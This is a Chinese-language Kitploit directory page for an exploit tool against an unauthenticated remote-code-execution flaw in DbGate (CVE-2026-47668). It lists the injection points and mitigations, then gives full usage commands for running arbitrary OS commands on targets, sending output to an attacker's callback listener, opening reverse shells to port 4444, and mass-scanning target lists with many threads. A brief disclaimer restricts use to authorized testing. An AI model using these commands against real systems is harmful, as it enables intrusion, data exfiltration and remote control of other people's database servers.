Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-47668 — DbGate 未认证远程代码执行 | Kitploit
工具/GitHubGitHub/nxploited/cve-2026-47668
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具Payload 开发
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate 未认证远程代码执行

查看仓库
643个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-47668 — DbGate 远程代码执行

DbGate JSON 脚本执行器(dbgate-serve ≤ 7.1.8)中的未认证 RCE。
评估工具:CVE-2026-47668.py — 仅限授权测试。

CVECVE-2026-47668
严重性严重
产品DbGate / dbgate-serve
受影响版本≤ 7.1.8
修复版本≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

漏洞

标题: DbGate 通过 JSON 脚本执行器实现未认证远程代码执行

用户可控字段(functionName、variableName)未经正确验证即被嵌入动态生成的 JavaScript 中。攻击者可在 Node.js 执行器子进程中执行任意代码。

项目详情
端点POST /runners/start
认证需要 Bearer;在匿名/默认部署中可通过 POST /auth/login 获取令牌
注入点JSON assign 命令中的 functionName、variableName
影响以 DbGate 进程用户身份执行操作系统命令

缓解措施: 升级至 7.1.9+。限制网络访问,禁用匿名认证,轮换凭据,审查日志中可疑的 /runners/start 活动。


联系方式

Telegram: @KNxploited


工具概述

CVE-2026-47668.py 针对您已获授权测试的 DbGate 实例进行检查和利用验证。

模式

模式反弹 Shell描述
AUTO无单次提示;令牌 + HTTP 回调 + 默认值
CLI可选通过参数完全控制
Mass无从 targets.txt 扫描
--reverse-shell是可选 TCP 验证(仅限单个目标)

结果

结果含义
FAIL无法访问、认证失败或不存在漏洞
VULN执行器仅接受探测
DISPATCH已发送载荷;未确认输出
EXFIL收到回调 — 已确认命令输出
REVSH反向 TCP 已连接(仅可选模式)

输出目录: Nx/(vuln、dispatch、exfil、failed、list_report、exfil/ 下每个目标的文件)


安装

root@kitploit:~
pip install -r requirements.txt

要求: Python 3.9+、aiohttp、colorama


使用方法

AUTO 向导(默认 — 无反弹 Shell)

root@kitploit:~
python CVE-2026-47668.py
提示输入示例
单个 URLhttp://192.168.1.10:3000
URL + 命令http://192.168.1.10:3000|id
目标列表targets.txt

CLI — 启用参数

每次 CLI 运行必须包含 --cli。

root@kitploit:~
python CVE-2026-47668.py --cli [options]

单个目标

-u / --url — 目标基础 URL

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — Shell 命令(默认:id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — 仅漏洞探测(不执行命令)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — 注入向量:functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — URL 未指定端口时的默认端口(默认:3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — 使用已有的 Bearer 令牌

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — 自定义登录请求体(默认:{"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — HTTP 超时时间(秒)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — 验证 TLS 证书

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

回调 / 数据外传(CLI 中使用 --cmd 时的默认行为)

--callback-host — 目标用来连接您监听器的 IP/主机名

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — HTTP 监听器的本地绑定地址(默认:0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — HTTP 外传端口(默认:8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — 外部回调 URL(禁用内置监听器)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — 等待回调的秒数(单个目标,默认:8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — 以非 base64 编码发送输出

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — 使用异步 exec 代替 execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

批量扫描(无反弹 Shell)

-f / --file — 目标列表文件

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — 并发工作线程数(默认:30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — 批量模式下每个目标等待回调的秒数(默认:8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

批量 + 自定义默认端口

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

反弹 Shell(可选 — 仅限单个目标)

普通测试不需要。请使用 HTTP 外传(--cmd)作为证明。

--reverse-shell — 目标连接至 LHOST:LPORT(省略值 = 局域网 IP + 端口 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — 当 --reverse-shell 未包含 :port 时使用的端口

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — 本地监听地址

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — 等待 TCP 连接(默认:15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — 连接后启用基本 stdin/stdout 中继

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Docker 说明: 使用可从 DbGate 容器访问的 IP(例如主机网关),而不仅仅是一台电脑上的 127.0.0.1。


目标列表(targets.txt)

root@kitploit:~
# comment
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • 无端口 → 自动应用 3000
  • host|command → 每行命令覆盖
  • 报告:Nx/list_report.txt

输出文件

文件内容
Nx/vuln.txt存在漏洞的目标(探测成功)
Nx/dispatch.txt已发送载荷,未确认
Nx/exfil.txt已确认的回调
Nx/failed.txt失败的目标
Nx/exfil/<host>.txt每个目标的命令输出
Nx/sessions/<id>/summary.json会话摘要

工作流程

  1. POST /auth/login → 获取 Bearer 令牌(除非使用 --token,否则自动执行)
  2. 探测 → 执行器接受注入
  3. POST /runners/start → 执行命令 + HTTP 回调(如果启用,则使用反向 TCP)
  4. 分类 → EXFIL = 已确认输出

免责声明

仅用于授权安全测试。 您必须获得明确许可才能测试任何系统。作者不对滥用或非法使用负责。


作者:Nxploited

下载工具